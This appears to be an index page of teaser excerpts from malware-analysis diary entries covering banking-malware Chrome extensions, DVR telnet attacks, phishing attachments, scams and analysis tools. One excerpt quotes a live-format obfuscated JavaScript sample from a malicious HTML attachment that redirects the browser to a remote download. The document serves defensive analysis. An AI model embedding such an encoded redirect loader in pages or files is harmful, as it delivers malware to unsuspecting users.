Second Google Chrome Extension Banker Malware in Two Weeks, (Tue, Aug 29th)

Introduction. It seems that Google Chrome extensions have become quite the tool for banking malware fraudsters. Two weeks ago, an offender phoned a victim and asked him to install a supposedly new bank security module that, instead, was a malicious extension hosted at the Google Chrome app store aimed at stealing the victim’s banking credentials [1]. …

An Update On DVR Malware: A DVR Torture Chamber, (Mon, Aug 28th)

Last week, the fact that someone leaked 1700 or so IP addresses with default username/password caused some people to get excited about the issue of default telnet credentials again. Ever since the “Mirai” outbreak, we do see a pretty constant stream of requests for port 23 (and to some extent 2323 as well as 22) …

Malicious AutoIT script delivered in a self-extracting RAR file, (Fri, Aug 25th)

Here is another sample that caught my curiosity. As usual, the infection vector was an email which delivered some HTML code in an attached file called “PO_5634_780.docx.html” (SHA1: d2158494e1b9e0bd85e56e431cbbbba465064f5a). It has a very low VT score (3/56) [1] and contains a simple piece of escaped JavaScript: document.write(unescape('%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%20%0A%75%72%6C%3D%68%74%74%70%73%3A%2F%2F%31%66%69%63%68%69%65%72%2E%63%6F%6D%2F%3F%64%6A%39%38%66%66%35%36%68%32%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A%3C%2F%53%63%72%69%70%74%3E')) Here is the decoded version: It downloads …

Free Bitcoins? Why not?, (Thu, Aug 24th)

Since the invention of the Internet (or e-mail) we have been seeing various scams that try to entice the user to transfer his hard-earned money to a scammer’s account. There are many, many forms of the old-fashioned advance-fee (419) scam, where the victim is usually asked to transfer money to the attacker’s account for whatever …

Malicious script dropping an executable signed by Avast?, (Wed, Aug 23rd)

Yesterday, I found an interesting sample that I started to analyze… It reached my spam trap attached to an email in Portuguese with the subject: “Venho por meio desta solicitar orçamento dos produtos” (“I hereby request the products budget”). There was one attached ZIP archive: PanilhaOrcamento.zip (SHA1: 3c159f65ba88bb208df30822d2a88b6531e4d0a7) with a VT score of 0/58[1]. Inside …

Defang all the things!, (Tue, Aug 22nd)

Today, I would like to promote a best practice via a small Python module that is very helpful when you’re dealing with suspicious or malicious URLs. Links in documents are potentially dangerous because users can always click on them by mistake. Many automated tools and scripts process documents to fetch links. Even if the …

It's Not An Invoice …, (Sun, Aug 20th)

Jeff received an invoice via email, did not trust it and submitted it to us. As expected, it was not an invoice, but a malicious Word document (MD5 9c4c3234f20b6102569216675b48c70a). I do a step-by-step analysis in this diary entry, but you can also watch a video of the analysis: https://www.youtube.com/watch?v=FRYYoixq_EY Let’s take a …

tshark 2.4 New Feature – Command Line Export Objects, (Fri, Aug 18th)

There is nothing new about Wireshark releasing an update; however, the new 2.4 branch has a new feature that is quite useful and that I have been waiting to use for a while. In case you missed it, tshark now has the ability to Export Objects. I have tested the export using large pcap files with multiple objects …

EngineBox Malware Supports 10+ Brazilian Banks, (Fri, Aug 18th)

1. Introduction. After receiving quite a large amount of malspam with similar messages in my honeypots this week, I decided to dedicate some time to analyzing what it was about. To my surprise, after peeling off multiple encoding layers protecting the malware’s core (it felt like peeling an onion), I could finally find a sophisticated and well …